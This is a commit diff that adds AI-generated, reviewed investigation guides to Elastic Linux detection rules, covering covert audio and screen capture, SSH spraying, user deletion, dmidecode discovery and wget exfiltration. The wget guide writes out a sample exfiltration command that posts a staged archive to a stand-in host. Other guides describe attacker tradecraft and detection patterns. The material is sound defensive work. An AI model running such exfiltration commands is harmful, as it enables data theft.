Prep for Release 9.3 (#5548)

This commit is contained in:
shashank-elastic
2026-01-12 21:07:07 +05:30
committed by GitHub
parent 8b84c26286
commit 1ce072a4e5
99 changed files with 4599 additions and 48 deletions
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -19,6 +19,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Audio Recording Activity Detected"
note = """## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Audio Recording Activity Detected
This rule flags executions of Linux audio-recording tools (arecord, parec, pw-record, ecasound, pw-cat -r, ffmpeg) started by uncommon parent processes, signaling potential covert microphone capture. Attackers often drop a systemd service or cron job that silently invokes arecord or ffmpeg to record from default PulseAudio/PipeWire devices and stash WAV/MP3 files under user directories or stream them to a remote host. Capturing ambient audio can reveal passwords, meeting content, and sensitive conversations, aiding reconnaissance and espionage.
### Possible investigation steps
- Examine the full process tree and session context (parent/grandparent, controlling TTY, logged-in user) to determine whether the launch came from an expected desktop workflow versus non-interactive origins like cron, systemd, or ssh.
- Parse the command line to identify input device and output target, then hunt for created artifacts (WAV/MP3/OGG) under common stash paths (~/.cache, ~/.local/share, /tmp, /var/tmp, hidden directories) and verify timestamps and owner.
- If the command indicates streaming or piping, inspect recent outbound network connections and DNS from the process/user for RTMP/HTTP/SFTP endpoints and correlate with firewall or EDR flow logs to detect exfiltration.
- Check for persistence mechanisms that could re-invoke the recorder, including systemd user/system units and timers, cron/anacron entries, and shell scripts in autostart paths, and disable or quarantine any suspicious items.
- Review audio subsystem and device access evidence (audit logs for open/read on /dev/snd/* and PipeWire/PulseAudio logs showing record nodes) to confirm capture and identify the device and scope.
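The parent-process check described above can be sketched as follows. This is a minimal illustrative heuristic, not the rule's actual new_terms logic; the event shape, the parent list, and the ffmpeg capture-device check are all assumptions to adapt to your telemetry.

```python
# Recorder binaries named by this rule; pw-cat only counts with -r,
# and ffmpeg only when reading a capture backend rather than a file.
RECORDERS = {"arecord", "parec", "pw-record", "ecasound"}
# Illustrative non-interactive parents; tune to your environment.
NON_INTERACTIVE_PARENTS = {"cron", "crond", "systemd", "sshd"}

def is_suspect_audio_capture(event: dict) -> bool:
    proc = event.get("process", {})
    name = proc.get("name", "")
    args = proc.get("args", [])
    parent = proc.get("parent", {}).get("name", "")
    recorder = (
        name in RECORDERS
        or (name == "pw-cat" and "-r" in args)
        or (name == "ffmpeg" and any(a in ("alsa", "pulse") for a in args))
    )
    return recorder and parent in NON_INTERACTIVE_PARENTS
```

Note that an ffmpeg transcode (`ffmpeg -i in.mp4 out.mp3`) does not match, which mirrors the false-positive guidance below.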
### False positive analysis
- ffmpeg is executed with -i to read an existing media file for transcode or audio extraction, not to capture from a microphone, which satisfies the rule conditions but is routine multimedia processing.
- A legitimate systemd or cron job starts arecord/parec/pw-record/pw-cat -r to periodically sample audio for device diagnostics or content creation, resulting in an uncommon parent process yet expected outputs under user or application directories.
### Response and remediation
- Immediately terminate arecord, parec, pw-record, ecasound, pw-cat -r, or ffmpeg processes launched by cron/systemd/ssh and stop any associated systemd units/timers, then block outbound RTMP/HTTP/SFTP connections from the recording user.
- Disable and remove persistence that invokes recording, including systemd .service/.timer files under /etc/systemd/system or ~/.config/systemd/user, cron entries in /etc/cron.* or user crontabs, and autostart scripts in ~/.config/autostart or /etc/xdg/autostart, and quarantine any unknown executables or wrappers in /tmp, /var/tmp, or hidden user directories that spawn these tools.
- Before cleanup, preserve the full command line and copies of recorded artifacts (WAV/MP3/OGG) located in ~/.cache, ~/.local/share, /tmp, /var/tmp, and hidden directories, then remove remaining audio files and staging folders after evidence collection.
- Verify recovery by confirming no active record nodes in PipeWire/PulseAudio and no further opens on /dev/snd/*, and restart affected user sessions or hosts if audio subsystem settings were altered.
- Harden by restricting access to /dev/snd/* via udev group membership and AppArmor/SELinux, whitelisting approved desktop apps, and adding detections to flag non-interactive parents launching arecord/ffmpeg or pw-cat -r and creation of large audio files in cache/temp paths.
- Escalate to incident response and privacy/legal if recording is initiated by a root-owned systemd service or an unknown binary in /tmp, or if audio streaming/exfiltration to external IPs/domains is observed.
"""
risk_score = 21
rule_id = "3ee526ce-1f26-45dd-9358-c23100d1121f"
severity = "low"
@@ -30,6 +61,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Video Recording or Screenshot Activity Detected"
note = """## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Video Recording or Screenshot Activity Detected
This alert flags the launch of common Linux screenshot or screen-recording tools—such as scrot, gnome-screenshot, flameshot, grim, or obs—when triggered by an atypical parent process, indicating potential visual data collection. A typical attacker pattern is a compromised user session or remote shell spawning scrot or grim during credential entry to capture MFA codes and application windows, or starting simplescreenrecorder/obs to persistently record the desktop for later exfiltration.
### Possible investigation steps
- Review the process lineage and session context to determine if the capture was launched interactively from a desktop or via ssh/cron/systemd or a script in transient directories.
- Inspect command-line options and environment variables (DISPLAY, WAYLAND_DISPLAY, XAUTHORITY) to identify window/region capture, explicit save targets, or headless clipboard-only usage.
- Search for newly created media files around the alert time (screenshots under ~/Pictures or /tmp, and recordings like .mkv/.webm) and evaluate their sensitivity and relevance.
- Verify binary provenance and integrity by checking installation logs, file path and ownership, hashes, and unexpected copies or modified ELF binaries in user-writable locations.
- Correlate with user and network telemetry for concurrent credential entry, browser MFA prompts, or outbound transfers/clipboard synchronization indicative of exfiltration.
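The media-artifact search above can be approximated offline once file metadata has been collected from the host. A hedged sketch, assuming a simple list-of-dicts input; field names and the 30-minute window are illustrative:

```python
from datetime import datetime, timedelta

# Screenshot/recording extensions called out in this guide.
MEDIA_EXT = (".png", ".jpg", ".webm", ".mkv")

def recent_media(files, alert_time, window_minutes=30):
    """Return paths of media files whose mtime falls near the alert.

    files: iterable of {"path": str, "mtime": datetime} records,
    e.g. gathered from EDR file telemetry or a find(1) sweep.
    """
    lo = alert_time - timedelta(minutes=window_minutes)
    hi = alert_time + timedelta(minutes=window_minutes)
    return [f["path"] for f in files
            if f["path"].lower().endswith(MEDIA_EXT)
            and lo <= f["mtime"] <= hi]
```

Anything this surfaces under /tmp or hidden directories deserves a sensitivity review before cleanup.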
### False positive analysis
- A user presses Print Screen or uses a desktop hotkey, and the environment launches gnome-screenshot, flameshot, or grim via a keybinding/compositor component, producing an uncommon parent despite benign activity.
- Legitimate demo or documentation recording with obs or simplescreenrecorder started by a wrapper script, cron, or a systemd unit can surface as a non-interactive start from an unusual parent without malicious intent.
### Response and remediation
- Immediately terminate the capture process (e.g., scrot, grim, flameshot, gnome-screenshot, simplescreenrecorder, obs) and isolate the host or terminate the GUI session, suspending the user and revoking SSH keys if the parent was sshd, cron, or a systemd unit.
- Eradicate launch points by deleting rogue systemd services/timers, crontab entries, ~/.config/autostart/*.desktop files, and scripts in /tmp or ~/bin that invoke these tools, and replace any trojanized binaries found outside package-managed paths.
- Recover by rotating passwords and invalidating MFA sessions/tokens used during the recorded period, then remove captured media (.png/.jpg/.webm/.mkv) from ~/Pictures, /tmp, and similar staging paths after evidence collection.
- Escalate to incident response and privacy/legal if screenshots/recordings contain credentials, customer data, or secrets, if execution originated from privileged users or servers, or if exfiltration is observed via scp/rsync/curl to external hosts.
- Harden endpoints by uninstalling unneeded screenshot/recording packages, enforcing allowlists and AppArmor/SELinux profiles that block scrot/grim/obs except for approved users, and requiring xdg-desktop-portal/PipeWire screencast prompts for console users only.
- Improve detection by alerting on these binaries executed by sshd/cron/systemd, repeated saves under ~/Pictures or /tmp, copies in user-writable paths (~/bin, /tmp), and outbound transfers of resulting media files.
"""
risk_score = 21
rule_id = "93dd73f9-3e59-45be-b023-c681273baf81"
severity = "low"
@@ -31,6 +62,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2025/12/24"
integration = ["system"]
maturity = "production"
updated_date = "2025/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -17,6 +17,36 @@ from = "now-9m"
language = "esql"
license = "Elastic License v2"
name = "Potential Password Spraying Attack via SSH"
note = """## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Password Spraying Attack via SSH
This rule flags bursts of failed SSH logins coming from the same network origin against many different Linux accounts within a short window, indicating password spraying that can precede account compromise. It matters because attackers try a small set of common passwords across broad user lists to evade lockouts and find one weak credential. A typical pattern is an external VPS rapidly trying passwords like “Welcome123” or “Spring2024!” against 30+ usernames (e.g., admin, test, ubuntu, devops) over five minutes via SSH on a single server.
### Possible investigation steps
- Check for any successful SSH authentications from the same source IP within a short window around the failures and, if found, pivot to session details such as interactive TTY use, sudo activity, and modifications like authorized_keys updates.
- Enrich the source IP with geolocation, ASN, reputation, and cloud-provider attribution and verify whether it is observed attempting SSH across multiple hosts to confirm a broad spray pattern.
- Compare the attempted usernames against your directory to identify valid and privileged or service accounts and confirm whether lockouts, password resets, or MFA challenges were triggered.
- Determine if the affected host is internet-exposed and which port SSH is reachable on, then review current SSH authentication settings (password vs key-based, PAM/MFA) to assess risk of compromise.
- Correlate the source IP with approved scanners, bastion hosts, or change tickets and maintenance windows to quickly rule out sanctioned testing or misconfigured monitoring.
### False positive analysis
- A misconfigured internal automation or admin script on a management or jump host sequentially attempts SSH to many accounts with an outdated password, producing more than 10 distinct usernames and at least 30 failures from a single source IP within five minutes.
- Legitimate users behind a shared NAT or bastion host concurrently attempt SSH with expired credentials during a password rotation or temporary authentication issue, making failures across many distinct usernames appear to come from one IP.
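The spray pattern this guide describes (many distinct usernames failing from one source within a short window) can be sketched as a sliding-window count. This is an illustrative re-implementation for ad-hoc log review, not the rule's ES|QL query; the thresholds mirror the ones quoted above:

```python
from collections import defaultdict
from datetime import timedelta

def spraying_sources(failures, window=timedelta(minutes=5),
                     min_users=10, min_failures=30):
    """failures: iterable of (timestamp, source_ip, username) tuples.

    Flags a source IP when, within any `window`, it produced at least
    `min_failures` failed logins spread across more than `min_users`
    distinct usernames.
    """
    by_ip = defaultdict(list)
    for ts, ip, user in failures:
        by_ip[ip].append((ts, user))
    flagged = set()
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            if (len(span) >= min_failures
                    and len({u for _, u in span}) > min_users):
                flagged.add(ip)
                break
    return flagged
```

Timestamps can be datetimes (with a timedelta window) or epoch seconds (with a numeric window), whichever your parsed logs provide.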
### Response and remediation
- Immediately block the spraying source IP(s) at host firewalls (iptables/nftables) and edge controls, and temporarily restrict SSH (port 22) to approved bastion/jump host CIDRs only.
- If any login succeeded or an sshd session from the same IP is active, terminate it, remove any newly added ~/.ssh/authorized_keys entries, and force password resets with MFA for the targeted users.
- Before restoring normal access, verify no persistence by checking for changes to /etc/ssh/sshd_config, sudoers, or cron jobs and reviewing /var/log/auth.log and lastlog for anomalies, then re-enable only required accounts.
- Escalate to incident response if privileged or service accounts were targeted, the spray spanned multiple servers, or there is evidence of sudo activity, file changes under /root or /etc, or a successful login, and preserve auth logs, bash histories, and firewall block artifacts.
- Harden SSH by disabling PasswordAuthentication, enforcing key-based auth with PAM MFA, setting conservative MaxAuthTries and LoginGraceTime, enabling fail2ban or equivalent bans, and restricting access via AllowUsers/AllowGroups and security group rules.
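The hardening bullet above maps to a handful of sshd_config directives. An illustrative excerpt (values are examples to adapt, and the `ssh-users` group is an assumption; validate with `sshd -t` before restarting sshd):

```
# /etc/ssh/sshd_config hardening excerpt
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
LoginGraceTime 30
AllowGroups ssh-users
```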
"""
risk_score = 21
rule_id = "9e81b1fd-e9fb-49a7-8ebe-0d1a14090142"
severity = "low"
@@ -25,6 +55,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Credential Access",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/08"
integration = ["system"]
maturity = "production"
updated_date = "2026/01/08"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["filebeat-*", "logs-system.auth-*"]
language = "eql"
license = "Elastic License v2"
name = "Linux User or Group Deletion"
note = """## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux User or Group Deletion
This rule surfaces successful deletions of Linux users or groups—activity that can erase evidence, hide persistence, or disrupt access control. A common pattern is an attacker with root rights running userdel -r to remove a temporary privileged account they used for access, deleting its home directory and mail spool to strip artifacts. Correlate with recent privilege escalation and changes to sudoers/wheel to identify whether this was malicious cleanup versus routine deprovisioning.
### Possible investigation steps
- Correlate with auth and sudo logs to identify the actor, session (TTY/SSH), and source IP that executed the deletion and confirm whether root was obtained via sudo or another escalation path.
- Inspect the process tree and command line to see if userdel/groupdel used -r to remove the home/mail spool and whether it was launched from an interactive shell, SSH session, or automation tooling.
- Validate expected deprovisioning by checking HR/ticketing/IdM and configuration-management activity around the time, and escalate if the deleted identity was privileged or part of sudo/wheel.
- Build a timeline around the event to find adjacent actions such as account creation, password or key changes, group membership edits, and modifications to /etc/passwd, /etc/group, /etc/shadow, or sudoers.
- Assess impact and persistence by locating services, cron/systemd units, files, ACLs, or running processes still referencing the deleted UID/GID, attempt recovery of the home/mail from backups, and look for wtmp/btmp/lastlog tampering.
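When working through the auth-log correlation above, the deletion events themselves can be pulled out with a small parser. A sketch, assuming the shadow-utils message format `userdel[pid]: delete user 'name'` (exact wording varies by distro, so treat the pattern as a starting point):

```python
import re

# shadow-utils logs lines like:
#   Jan 12 10:01:02 host userdel[2315]: delete user 'tmpadmin'
USERDEL_RE = re.compile(r"userdel\[\d+\]: delete user '(?P<user>[^']+)'")

def deleted_users(log_lines):
    """Return usernames deleted according to the given syslog lines."""
    return [m.group("user") for line in log_lines
            if (m := USERDEL_RE.search(line)) is not None]
```

The extracted names can then be checked against your IdM/ticketing records to separate sanctioned deprovisioning from cleanup.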
### False positive analysis
- Scheduled deprovisioning or baseline enforcement where administrators intentionally remove stale local users or groups associated with retired projects, decommissioned systems, or role changes during maintenance.
- Package uninstall or system maintenance scripts that add a service account during setup and later remove it during cleanup, causing legitimate user/group deletion events.
### Response and remediation
- If the deletion is unauthorized, immediately isolate the host and restrict interactive access by setting PermitRootLogin no and tightening AllowUsers/AllowGroups in /etc/ssh/sshd_config, then systemctl restart sshd to apply.
- Review and clean authorization and persistence by inspecting /etc/sudoers and /etc/sudoers.d for unauthorized rules, checking wheel/sudo memberships in /etc/group, and purging cron or systemd units that reference the deleted UID/GID.
- Recover the identity if legitimate by recreating the user/group with the original UID/GID from /var/backups/{passwd,group,shadow}, restoring the corresponding /home directory and /var/spool/mail from backups, and reassigning orphaned files using find -nouser -nogroup to a valid account.
- Rotate credentials associated with the deleted identity by replacing SSH keys and secrets found in ~/.ssh/authorized_keys and application configs, and invalidate cached tokens and service account credentials that may have been shared.
- Escalate to incident response if the deleted account was privileged (present in wheel/sudo groups), userdel/groupdel used -r to remove the home/mail spool, or evidence of log tampering exists such as truncated /var/log/auth.log or altered wtmp/btmp/lastlog.
- Harden by centralizing local account lifecycle in IdM/LDAP, enforcing visudo-managed sudo changes, enabling auditd watches on /usr/sbin/userdel and /usr/sbin/groupdel and on writes to /etc/passwd, /etc/group, and /etc/shadow, and deploying AIDE to monitor integrity of /etc.
"""
risk_score = 21
rule_id = "8f8004e1-0783-485f-a3da-aca4362f74a7"
setup = """## Setup
@@ -43,6 +74,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Defense Evasion",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "System Information Discovery via dmidecode from Parent Shell"
note = """## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating System Information Discovery via dmidecode from Parent Shell
This rule flags dmidecode launched from a parent shell, signaling collection of hardware and firmware inventory that adversaries use to profile a host and inform exploitation or lateral movement. A typical pattern is an intruder running bash -c 'dmidecode -t system -t bios' within a post-exploitation script to harvest model, serial, BIOS vendor, and hypervisor indicators, then tailoring payload choices or host-based evasion accordingly.
### Possible investigation steps
- Extract the full parent shell command payload to see exact dmidecode arguments, targeted DMI types, and any output redirection or piping to grep, gzip, curl, scp, or similar utilities indicating data collection or exfiltration.
- Correlate execution context by tying the parent shell to the user, TTY versus non-interactive origin (cron/systemd/SSH), source IP, and presence of unexpected sudo/root elevation to judge intent and privilege.
- Pivot on the parent PID and session to list adjacent commands within the timeline to identify broader discovery or staging chains and any script or binary loader used.
- Search for captured output by reviewing recent file writes under /tmp, /var/tmp, /dev/shm, and home directories for DMI dumps, hardware inventory files, or compressed archives, and triage ownership and timestamps.
- Investigate network activity from the shell and its children around the event for outbound connections, especially HTTP/S3/SSH transfers that could carry dmidecode output, and capture destination details for enrichment.
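The first step above (inspecting the shell's -c payload for dmidecode piped into transfer utilities) can be sketched with a crude pipeline split. This is a triage heuristic, not a full shell parser; the tool list is an example:

```python
import shlex

# Utilities whose presence downstream of dmidecode suggests the
# output is being staged or sent off-host (illustrative set).
EXFIL_TOOLS = {"curl", "wget", "scp", "nc"}

def dmidecode_exfil_risk(shell_payload: str) -> bool:
    """True if dmidecode output appears piped toward a transfer tool."""
    if "dmidecode" not in shell_payload:
        return False
    # Naive split on "|"; good enough for triage, not parsing-complete
    # (it will miscount a literal "|" inside quoted arguments).
    stages = [shlex.split(part) for part in shell_payload.split("|")]
    return any(stage and stage[0] in EXFIL_TOOLS for stage in stages[1:])
```

A redirection-only invocation (`dmidecode -t bios > /tmp/dmi.txt`) does not match here, but the output file still warrants the artifact hunt described above.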
### False positive analysis
- A system administrator runs a shell with -c to execute dmidecode during manual troubleshooting; corroborate with an interactive TTY, a known admin user, and absence of adjacent collection or network activity.
- A legitimate cron or systemd maintenance/provisioning job calls a shell with -c to run dmidecode for hardware inventory; verify the scheduled unit or service, script location under /etc, and expected run cadence.
### Response and remediation
- Immediately kill the shell process running '-c "dmidecode ..."', terminate its children (e.g., grep, gzip, curl, scp), and isolate the host if the command chained output to a network transfer.
- Block observed exfil destinations by adding temporary egress rules for the IP/domain referenced in the parent shell (curl/wget/scp targets), and confiscate any DMI dumps or archives found under /tmp, /var/tmp, or /dev/shm.
- Remove persistence by deleting scripts and jobs that call dmidecode, including entries under /etc/cron.*, systemd units in /etc/systemd/system, or shell scripts dropped in home directories and /opt, and clear residual output files.
- Recover by validating integrity of /usr/sbin/dmidecode and shell binaries (bash/sh/zsh), restoring from backup if tampering is detected, and re-enable network only after rotating passwords and SSH keys for affected accounts.
- Escalate to incident response if dmidecode output is compressed/encoded then sent externally (e.g., '/tmp/dmi.txt.gz' piped to curl or scp), if run via sudo by an unexpected user, or observed on multiple hosts in a short window.
- Harden by restricting dmidecode use to approved scripts via sudoers and AppArmor/SELinux profiles, alerting on shell '-c' hardware inventory commands, auditing writes to /tmp and /var/tmp, and replacing ad-hoc inventory with signed, centrally managed tooling.
"""
references = ["https://research.checkpoint.com/2024/29676/"]
risk_score = 21
rule_id = "da0ebebe-5ad3-4277-95e7-889f5a69b959"
@@ -69,6 +100,7 @@ tags = [
"Data Source: Elastic Endgame",
"Data Source: Elastic Defend",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -23,6 +23,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "Potential Data Exfiltration Through Wget"
note = """## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Data Exfiltration Through Wget
This rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic.
### Possible investigation steps
- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin.
- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action.
- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy.
- Pivot 30-60 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file.
- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment.
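Pulling the posted file path and destination out of the captured command line (the first step above) can be sketched as below. A hedged helper for triage tooling, assuming argv is already available; the internal-host allowlist is an assumed input:

```python
from urllib.parse import urlparse

# wget flags that upload a local file via HTTP POST (see GTFOBins).
UPLOAD_FLAGS = ("--post-file", "--body-file")

def wget_upload(args, internal_hosts=frozenset()):
    """Return (posted_path, destination_host) for an upload-style wget
    invocation to a non-allowlisted host, else None."""
    posted = url = None
    for a in args:
        for flag in UPLOAD_FLAGS:
            if a.startswith(flag + "="):
                posted = a.split("=", 1)[1]
        if a.startswith(("http://", "https://", "ftp://")):
            url = a
    if posted is None or url is None:
        return None
    host = urlparse(url).hostname
    return None if host in internal_hosts else (posted, host)
```

A non-None result gives you the file to hash and the endpoint to enrich with DNS/WHOIS and egress logs.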
### False positive analysis
- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics.
- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event.
### Response and remediation
- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory.
- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking account's API tokens and SSH keys.
- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured.
- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups.
- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root.
- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary.
"""
references = ["https://gtfobins.github.io/gtfobins/wget/"]
risk_score = 47
rule_id = "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6"
@@ -62,6 +93,7 @@ tags = [
"Data Source: Crowdstrike",
"Data Source: SentinelOne",
"Data Source: Elastic Endgame",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"